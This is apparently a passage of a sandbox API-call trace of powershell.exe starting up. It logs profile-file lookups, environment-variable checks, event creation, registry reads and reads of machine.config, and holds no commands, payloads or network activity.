	[0178.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xced3c | out: lpFileInformation=0xced3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.796] GetLastError () returned 0x2
	[0178.796] SetErrorMode (uMode=0x1) returned 0x1
	[0178.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xce8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0178.796] GetLastError () returned 0x2
	[0178.796] SetErrorMode (uMode=0x1) returned 0x1
	[0178.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xced3c | out: lpFileInformation=0xced3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.796] GetLastError () returned 0x3
	[0178.796] SetErrorMode (uMode=0x1) returned 0x1
	[0178.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xce8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0178.796] GetLastError () returned 0x3
	[0178.796] SetErrorMode (uMode=0x1) returned 0x1
	[0178.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xced3c | out: lpFileInformation=0xced3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.796] GetLastError () returned 0x3
	[0178.797] SetErrorMode (uMode=0x1) returned 0x1
	[0178.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.798] GetLastError () returned 0xcb
	[0178.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.801] GetLastError () returned 0xcb
	[0178.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.805] GetLastError () returned 0xcb
	[0178.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.833] GetLastError () returned 0xcb
	[0178.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.834] GetLastError () returned 0xcb
	[0178.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.845] GetLastError () returned 0xcb
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324
	[0178.846] GetLastError () returned 0x0
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b8
	[0178.846] GetLastError () returned 0x0
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0178.846] GetLastError () returned 0x0
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0178.846] GetLastError () returned 0x0
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0178.846] GetLastError () returned 0x0
	[0178.846] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x360
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc
	[0178.847] GetLastError () returned 0x0
	[0178.847] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0178.847] GetLastError () returned 0x0
	[0178.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.849] GetLastError () returned 0xcb
	[0178.856] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0178.856] GetLastError () returned 0xcb
	[0178.858] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xced7c | out: lpMode=0xced7c) returned 1
	[0178.858] GetLastError () returned 0xcb
	[0178.860] SetEvent (hEvent=0x344) returned 1
	[0178.860] GetLastError () returned 0xcb
	[0178.860] SetEvent (hEvent=0x324) returned 1
	[0178.860] GetLastError () returned 0xcb
	[0178.860] SetEvent (hEvent=0x3b8) returned 1
	[0178.860] GetLastError () returned 0xcb
	[0178.860] SetEvent (hEvent=0x32c) returned 1
	[0178.860] GetLastError () returned 0xcb
	[0178.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370
	[0178.861] GetLastError () returned 0x0
	[0178.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.862] GetLastError () returned 0xcb
	[0178.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcebe0 | out: phkResult=0xcebe0*=0x374) returned 0x0
	[0178.863] RegQueryValueExW (in: hKey=0x374, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcec28, lpData=0x0, lpcbData=0xcec24*=0x0 | out: lpType=0xcec28*=0x0, lpData=0x0, lpcbData=0xcec24*=0x0) returned 0x2

Thread:
	id = 81
	os_tid = 0x974


Thread:
	id = 82
	os_tid = 0x984


Thread:
	id = 83
	os_tid = 0x994


Thread:
	id = 84
	os_tid = 0x9a4


Thread:
	id = 85
	os_tid = 0x9b4

	[0086.474] CoGetContextToken (in: pToken=0x4bcf868 | out: pToken=0x4bcf868) returned 0x0
	[0086.474] CObjectContext::QueryInterface () returned 0x0
	[0086.474] CObjectContext::GetCurrentThreadType () returned 0x0
	[0086.474] Release () returned 0x0
	[0086.475] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0152.445] LocalFree (hMem=0x348710) returned 0x0
	[0152.445] GetLastError () returned 0x0
	[0152.445] CloseHandle (hObject=0x344) returned 1
	[0152.445] GetLastError () returned 0x0
	[0152.445] CloseHandle (hObject=0x13) returned 1
	[0152.446] GetLastError () returned 0x0
	[0152.446] CloseHandle (hObject=0xf) returned 1
	[0152.446] GetLastError () returned 0x0
	[0152.446] RegCloseKey (hKey=0x32c) returned 0x0
	[0152.446] RegCloseKey (hKey=0x328) returned 0x0
	[0152.446] RegCloseKey (hKey=0x324) returned 0x0
	[0152.447] LocalFree (hMem=0x348730) returned 0x0
	[0152.447] GetLastError () returned 0x0
	[0152.447] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.384] RegCloseKey (hKey=0x34c) returned 0x0
	[0170.227] RegCloseKey (hKey=0x3c8) returned 0x0
	[0170.228] RegCloseKey (hKey=0x3a8) returned 0x0
	[0170.228] RegCloseKey (hKey=0x3a4) returned 0x0
	[0170.228] RegCloseKey (hKey=0x3a0) returned 0x0
	[0170.229] RegCloseKey (hKey=0x39c) returned 0x0
	[0170.229] RegCloseKey (hKey=0x398) returned 0x0
	[0170.229] RegCloseKey (hKey=0x394) returned 0x0
	[0170.230] RegCloseKey (hKey=0x390) returned 0x0
	[0170.230] RegCloseKey (hKey=0x328) returned 0x0
	[0170.230] RegCloseKey (hKey=0x3c4) returned 0x0
	[0170.230] RegCloseKey (hKey=0x3c0) returned 0x0
	[0170.231] RegCloseKey (hKey=0x388) returned 0x0
	[0170.231] RegCloseKey (hKey=0x384) returned 0x0
	[0170.231] RegCloseKey (hKey=0x380) returned 0x0
	[0170.232] RegCloseKey (hKey=0x37c) returned 0x0
	[0170.232] RegCloseKey (hKey=0x378) returned 0x0
	[0170.232] RegCloseKey (hKey=0x374) returned 0x0
	[0170.232] RegCloseKey (hKey=0x370) returned 0x0
	[0170.233] RegCloseKey (hKey=0x36c) returned 0x0
	[0170.233] RegCloseKey (hKey=0x3bc) returned 0x0
	[0170.233] RegCloseKey (hKey=0x364) returned 0x0
	[0170.234] RegCloseKey (hKey=0x360) returned 0x0
	[0170.234] RegCloseKey (hKey=0x35c) returned 0x0
	[0170.234] RegCloseKey (hKey=0x358) returned 0x0
	[0170.235] RegCloseKey (hKey=0x354) returned 0x0
	[0170.235] RegCloseKey (hKey=0x350) returned 0x0
	[0170.235] RegCloseKey (hKey=0x344) returned 0x0
	[0170.236] RegCloseKey (hKey=0x32c) returned 0x0
	[0170.236] RegCloseKey (hKey=0x3b8) returned 0x0
	[0170.236] RegCloseKey (hKey=0x324) returned 0x0
	[0170.236] RegCloseKey (hKey=0x34c) returned 0x0
	[0170.237] RegCloseKey (hKey=0x3b4) returned 0x0
	[0170.237] RegCloseKey (hKey=0x3b0) returned 0x0
	[0170.237] RegCloseKey (hKey=0x38c) returned 0x0
	[0179.401] RegCloseKey (hKey=0x374) returned 0x0

Thread:
	id = 130
	os_tid = 0x918


Thread:
	id = 212
	os_tid = 0x5c4

	[0178.968] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0179.111] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0179.117] VirtualQuery (in: lpAddress=0x5e4e5f0, lpBuffer=0x5e4f5f0, dwLength=0x1c | out: lpBuffer=0x5e4f5f0*(BaseAddress=0x5e4e000, AllocationBase=0x54c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.121] GetLastError () returned 0xcb
	[0179.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.129] GetLastError () returned 0xcb
	[0179.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.132] GetLastError () returned 0xcb
	[0179.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.166] GetLastError () returned 0xcb
	[0179.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.169] GetLastError () returned 0xcb
	[0179.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.170] GetLastError () returned 0xcb
	[0179.208] VirtualQuery (in: lpAddress=0x5e4e70c, lpBuffer=0x5e4f70c, dwLength=0x1c | out: lpBuffer=0x5e4f70c*(BaseAddress=0x5e4e000, AllocationBase=0x54c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.209] GetLastError () returned 0xcb
	[0179.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.211] GetLastError () returned 0xcb
	[0179.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.211] GetLastError () returned 0xcb
	[0179.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.282] GetLastError () returned 0xcb
	[0179.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.435] GetLastError () returned 0xcb
	[0179.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.621] GetLastError () returned 0xcb
	[0179.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.623] GetLastError () returned 0xcb
	[0179.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.625] GetLastError () returned 0xcb
	[0179.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.627] GetLastError () returned 0xcb
	[0179.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.629] GetLastError () returned 0xcb
	[0179.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.630] GetLastError () returned 0xcb
	[0179.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.632] GetLastError () returned 0xcb
	[0179.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3329a8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.744] GetLastError () returned 0xcb
	[0180.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.223] GetLastError () returned 0xcb
	[0180.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.251] GetLastError () returned 0xcb
	[0180.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x332a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.254] GetLastError () returned 0xcb
	[0186.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5e4ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.310] GetLastError () returned 0xcb
	[0186.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5e4eb68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.310] GetLastError () returned 0xcb
	[0186.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39fb38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5e4ebec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0186.415] GetLastError () returned 0x0
	[0186.579] GetCurrentProcess () returned 0xffffffff
	[0186.579] GetLastError () returned 0x3f0
	[0186.579] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed00 | out: TokenHandle=0x5e4ed00*=0x330) returned 1
	[0186.579] GetLastError () returned 0x3f0
	[0186.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5e4e898, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0186.588] GetLastError () returned 0x0
	[0186.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5e4ed40 | out: lpFileInformation=0x5e4ed40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.591] GetLastError () returned 0x0
	[0186.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5e4e858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.657] GetLastError () returned 0x0
	[0186.660] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5e4ed3c | out: lpFileInformation=0x5e4ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.660] GetLastError () returned 0x0
	[0186.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5e4e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.660] GetLastError () returned 0x0
	[0186.660] SetErrorMode (uMode=0x1) returned 0x1
	[0186.660] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x374
	[0186.660] GetLastError () returned 0x0
	[0186.661] GetFileType (hFile=0x374) returned 0x1
	[0186.661] SetErrorMode (uMode=0x1) returned 0x1
	[0186.661] GetFileType (hFile=0x374) returned 0x1
	[0186.665] GetFileSize (in: hFile=0x374, lpFileSizeHigh=0x5e4ed10 | out: lpFileSizeHigh=0x5e4ed10*=0x0) returned 0x60ed
	[0186.665] GetLastError () returned 0x0
	[0186.665] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4ecc8, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4ecc8*=0x1000, lpOverlapped=0x0) returned 1
	[0186.665] GetLastError () returned 0x0
	[0186.672] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4e980, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4e980*=0x1000, lpOverlapped=0x0) returned 1
	[0186.672] GetLastError () returned 0x0
	[0186.674] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4e980, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4e980*=0x1000, lpOverlapped=0x0) returned 1
	[0186.674] GetLastError () returned 0x0
	[0186.674] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4e980, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4e980*=0x1000, lpOverlapped=0x0) returned 1
	[0186.674] GetLastError () returned 0x0
	[0186.674] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4e980, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4e980*=0x1000, lpOverlapped=0x0) returned 1
	[0186.674] GetLastError () returned 0x0
	[0186.726] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4eab4, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4eab4*=0x1000, lpOverlapped=0x0) returned 1
	[0186.726] GetLastError () returned 0x0
	[0186.726] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4e948, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4e948*=0xed, lpOverlapped=0x0) returned 1
	[0186.727] GetLastError () returned 0x0
	[0186.727] ReadFile (in: hFile=0x374, lpBuffer=0x2cb2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5e4ea00, lpOverlapped=0x0 | out: lpBuffer=0x2cb2634*, lpNumberOfBytesRead=0x5e4ea00*=0x0, lpOverlapped=0x0) returned 1
	[0186.727] GetLastError () returned 0x0
	[0186.729] CloseHandle (hObject=0x374) returned 1
	[0186.729] GetLastError () returned 0x0
	[0186.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5e4ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.731] GetLastError () returned 0x0
	[0186.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5e4eb68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.731] GetLastError () returned 0x0
	[0186.731] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39fb38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5e4ebec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0186.731] GetLastError () returned 0x0
	[0186.736] GetCurrentProcess () returned 0xffffffff
	[0186.736] GetLastError () returned 0x3f0
	[0186.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ef90 | out: TokenHandle=0x5e4ef90*=0x374) returned 1
	[0186.736] GetLastError () returned 0x3f0
	[0186.738] GetCurrentProcess () returned 0xffffffff
	[0186.738] GetLastError () returned 0x3f0
	[0186.738] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ef90 | out: TokenHandle=0x5e4ef90*=0x334) returned 1
	[0186.738] GetLastError () returned 0x3f0
	[0186.740] GetCurrentProcess () returned 0xffffffff
	[0186.740] GetLastError () returned 0x3f0
	[0186.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ed00 | out: TokenHandle=0x5e4ed00*=0x3c0) returned 1
	[0186.740] GetLastError () returned 0x3f0
	[0186.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5e4ed40 | out: lpFileInformation=0x5e4ed40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.740] GetLastError () returned 0x2
	[0186.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5e4e858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.740] GetLastError () returned 0x2
	[0186.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5e4ed3c | out: lpFileInformation=0x5e4ed3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.740] GetLastError () returned 0x2
	[0186.741] GetCurrentProcess () returned 0xffffffff
	[0186.741] GetLastError () returned 0x3f0
	[0186.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ef90 | out: TokenHandle=0x5e4ef90*=0x3c4) returned 1
	[0186.741] GetLastError () returned 0x3f0
	[0186.742] GetCurrentProcess () returned 0xffffffff
	[0186.742] GetLastError () returned 0x3f0
	[0186.742] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5e4ef90 | out: TokenHandle=0x5e4ef90*=0x328) returned 1
	[0186.742] GetLastError () returned 0x3f0
